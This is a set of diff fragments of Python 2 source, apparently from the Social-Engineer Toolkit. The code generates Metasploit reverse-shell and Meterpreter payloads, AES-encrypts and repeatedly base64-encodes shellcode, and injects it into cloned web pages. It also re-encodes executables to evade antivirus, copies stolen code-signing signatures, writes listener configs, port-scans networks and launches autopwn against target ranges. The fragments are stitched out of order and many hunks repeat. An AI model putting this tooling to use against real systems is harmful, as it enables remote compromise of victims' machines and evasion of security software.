if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
os.remove("%s/src/program_junk/meta_config_multipyinjector" % (definepath))
while 1:
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# break out of loop, no longer needed
if choice9 == "6": break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), shellcode_ports)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/src/program_junk/meterpreter.raw" % (path,choice9,choice2,portnum,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/src/program_junk/meterpreter.raw -t raw BufferRegister=EAX > %s/src/program_junk/meterpreter.alpha_decoded" % (path,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
os.remove("%s/src/program_junk/meta_config_multipyinjector" % (definepath))
while 1:
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# break out of loop, no longer needed
if choice9 == "6": break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), shellcode_ports)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1"
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1"
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
# break out of the loop if we are only using one payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
# here we are going to encode the payload via base64
fileopen = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = base64.b64encode(data)
# encode it again for the fun 2
data = base64.b64encode(data)
# again 3
data = base64.b64encode(data)
# again 4
data = base64.b64encode(data)
# again 5
data = base64.b64encode(data)
# again 6
data = base64.b64encode(data)
# again 7
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# 9
data = base64.b64encode(data)
# 10
data = base64.b64encode(data)
# last one
data = base64.b64encode(data)
#
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# break out of the loop if we are only using one payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
# here we are going to encode the payload via base64
fileopen = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = base64.b64encode(data)
# encode it again for the fun 2
data = base64.b64encode(data)
# again 3
data = base64.b64encode(data)
# again 4
data = base64.b64encode(data)
# again 5
data = base64.b64encode(data)
# again 6
data = base64.b64encode(data)
# again 7
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# 9
data = base64.b64encode(data)
# 10
data = base64.b64encode(data)
# last one
data = base64.b64encode(data)
#
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3,3).upper()
if choice1 == "shellcode/alphanum":
fileopen = file("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb")
if choice1 == "shellcode/pyinject":
fileopen = file("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/alphanum":
fileopen = file("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb")
if choice1 == "shellcode/pyinject":
fileopen = file("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
filewrite = file("%s/src/program_junk/shellcodeexec.custom" % (definepath), "wb")
filewrite = file("%s/src/program_junk/shellcodeexec.custom" % (definepath), "wb")
data = fileopen.read()
filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close()
@ -526,30 +526,30 @@ try:
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace('param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(secret)
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(secret)
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(data)
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/src/program_junk/web_clone/index.html.new %s/src/program_junk/web_clone/index.html 1> /dev/null 2> /dev/null" % (definepath,definepath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# here we specify the payload name thats stored later on
choice1 = choice9
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = file("src/program_junk/metasploit.payload", "w")
@ -580,7 +580,7 @@ try:
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/src/program_junk/web_clone/index.html.new %s/src/program_junk/web_clone/index.html" % (definepath,definepath), stdout=subprocess.PIPE, shell=True)
@ -592,7 +592,7 @@ try:
print_info("Encoding the payload %s times to get around pesky Anti-Virus. [-]\n" % (str(encount)))
encodepayload=subprocess.Popen(r"ruby %s/msfencode < %s/src/program_junk/1msf.exe -e %s -o %s/src/program_junk/msf.exe -t exe -c %s" % (path,definepath,encode,definepath,encount), shell=True).wait()
# subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
# If option 16 or default then go here
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
@ -618,7 +618,7 @@ try:
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", "src/program_junk/msf.exe", "src/program_junk/msf2.exe")
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe", shell=True).wait()
@ -632,86 +632,86 @@ try:
# if we have the java attack, multiattack java, and the set interactive shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
if attack_vector != "set_payload":
# pull in the ports from config
port1=check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
port2=check_config("LINUX_REVERSE_PORT=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/src/porgram_junk/mac.bin;chmod 755 %s/src/program_junk/mac.bin" % (path,choice2,port1,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/src/program_junk/nix.bin" % (path,choice2,port2,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
# if we are using the multiattack, there will be port conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
port2=check_config("LINUX_REVERSE_PORT=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/src/porgram_junk/mac.bin;chmod 755 %s/src/program_junk/mac.bin" % (path,choice2,port1,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/src/program_junk/nix.bin" % (path,choice2,port2,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
# try block here
try:
# if they want a listener, start here
if os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if its already created
filewrite=file("%s/src/program_junk/meta_config" % (definepath), "a")
if os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if its already created
filewrite=file("%s/src/program_junk/meta_config" % (definepath), "a")
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if we need to create it
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if we need to create it
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/src/program_junk/multi_meta" % (definepath)):
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), choice3)
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\n\n")
filewrite.write("exploit -j\n\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo": filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD osx/x86/shell_reverse_tcp" +"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port1+"\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD linux/x86/shell/reverse_tcp"+"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port2+"\n")
if linux_meterpreter_multi == "ON":
multiwrite=file("src/program_junk/lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/lin_multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD osx/x86/shell_reverse_tcp" +"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port1+"\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD linux/x86/shell/reverse_tcp"+"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port2+"\n")
if linux_meterpreter_multi == "ON":
multiwrite=file("src/program_junk/lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/lin_multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
@ -722,8 +722,8 @@ try:
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remenant files
if attack_vector == "multiattack":
@ -734,4 +734,4 @@ if os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile("src/program_junk/meta_config"): os.remove("src/program_junk/meta_config")
if os.path.isfile("src/program_junk/meta_config"): os.remove("src/program_junk/meta_config")


@ -25,8 +25,8 @@ if choice == "YES":
# if we did select the set payload as our option
if os.path.isfile("src/program_junk/set.payload"):
if check_options("PORT=") != 0:
port = check_options("PORT=")
if check_options("PORT=") != 0:
port = check_options("PORT=")
set_payload = file("src/program_junk/set.payload", "r")


@ -57,11 +57,11 @@ if os.path.isfile("src/program_junk/interface"):
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on for the reverse listener"))
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
else:
@ -74,7 +74,7 @@ else:
# grab port options from payloadgen.py
if check_options("PORT=") != 0:
port = check_options("PORT=")
port = check_options("PORT=")
else:
port = raw_input(setcore.setprompt("0", "Port you want to use for the connection back"))
@ -231,13 +231,13 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/payloads/set_payloads/http_shell.binary", "src/program_junk/web_clone/msf.exe")
# if os.path.isfile("src/html/msf.exe"):
# if os.path.isfile("src/html/msf.exe"):
# os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
# catch errors, will convert to log later
# catch errors, will convert to log later
except Exception, error:
setcore.log(error)


@ -60,19 +60,19 @@ def scan(host, start, stop):
results[(nhost, nport)] = nstatus
status = results[(host, port)]
if status <> 'CLOSED':
port_open = '%s:%d %s' % (host, port, status)
print_status(port_open)
host_list = host_list + "," + port_open
host_down = 1
port_open = '%s:%d %s' % (host, port, status)
print_status(port_open)
host_list = host_list + "," + port_open
host_down = 1
# if no hosts were up then report host down
if host_down == 0:
return False
return False
# else host is up and return those hosts
if host_down == 1:
time.sleep(1)
#host_list = str(host_list[1:])
return host_list
time.sleep(1)
#host_list = str(host_list[1:])
return host_list
# Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license.
@ -158,19 +158,18 @@ def validateCIDRBlock(b):
# passed all checks -> return True
return True
# start the actual stuff to grab cidr and port scan
# start the actual stuff to grab cidr and port scan
def launch(cidrBlock,lowport,highport):
print_status("SET is now scanning the IPs specified... please be patient.")
if not validateCIDRBlock(cidrBlock):
print_status("SET is now scanning the IPs specified... please be patient.")
if not validateCIDRBlock(cidrBlock):
# validate its really an ip address if solo
ip_check = is_valid_ip(cidrBlock)
if ip_check != False:
print_status("CIDR notation not specified. Trying single IP address.")
scan(cidrBlock, int(lowport), int(highport))
return host_list
else:
print_warning("Invalid IP Address, try again.")
ip_check = is_valid_ip(cidrBlock)
if ip_check != False:
print_status("CIDR notation not specified. Trying single IP address.")
scan(cidrBlock, int(lowport), int(highport))
return host_list
else:
printCIDR(cidrBlock,lowport,highport)
return host_list
print_warning("Invalid IP Address, try again.")
else:
printCIDR(cidrBlock,lowport,highport)
return host_list



@ -40,4 +40,3 @@ def test(HandlerClass = SecureHTTPRequestHandler,
if __name__ == '__main__':
test()


@ -14,48 +14,48 @@ os.chdir("CA/")
# create necessary files
subprocess.Popen("echo '01' > serial;touch index.txt", shell=True).wait()
filewrite=file("openssl.cnf", "w")
filewrite.write("""#
# OpenSSL configuration file.
#
filewrite.write("""#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
[ req ]
default_bits = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
# Establish working directory.
dir = .
[ req ]
default_bits = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
# Variable name Prompt string
#---------------------- ----------------------------------
0.organizationName = Organization Name (company)
organizationalUnitName = Organizational Unit Name (department, division)
emailAddress = Email Address
emailAddress_max = 40
localityName = Locality Name (city, district)
stateOrProvinceName = State or Province Name (full name)
countryName = Country Name (2 letter code)
countryName_min = 2
countryName_max = 2
commonName = Common Name (hostname, IP, or your name)
commonName_max = 64
[ req_distinguished_name ]
# Variable name Prompt string
#---------------------- ----------------------------------
0.organizationName = Organization Name (company)
organizationalUnitName = Organizational Unit Name (department, division)
emailAddress = Email Address
emailAddress_max = 40
localityName = Locality Name (city, district)
stateOrProvinceName = State or Province Name (full name)
countryName = Country Name (2 letter code)
countryName_min = 2
countryName_max = 2
commonName = Common Name (hostname, IP, or your name)
commonName_max = 64
# Default values for the above, for consistency and less typing.
# Variable name Value
#------------------------------ ------------------------------
0.organizationName_default = The Sample Company
localityName_default = Metropolis
stateOrProvinceName_default = New York
countryName_default = US
# Default values for the above, for consistency and less typing.
# Variable name Value
#------------------------------ ------------------------------
0.organizationName_default = The Sample Company
localityName_default = Metropolis
stateOrProvinceName_default = New York
countryName_default = US
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always""")
# close editing of the file
filewrite.close()
subprocess.Popen("openssl req -new -x509 -extensions v3_ca -keyout private/cakey.pem -out newcert.pem -days 3650 -config ./openssl.cnf", shell=True).wait()
subprocess.Popen("cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait()
subprocess.Popen("cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait()
os.chdir(definepath)


@ -11,47 +11,47 @@ import pexpect
# this will load the database
def prep(database, ranges):
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer")
child.interact()
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer")
child.interact()
# handle exceptions and log them
except Exception, error: setcore.log(error)
# handle exceptions and log them
except Exception, error: setcore.log(error)
def do_autopwn():
print 'Doing do_autopwn'
# pull the metasploit database
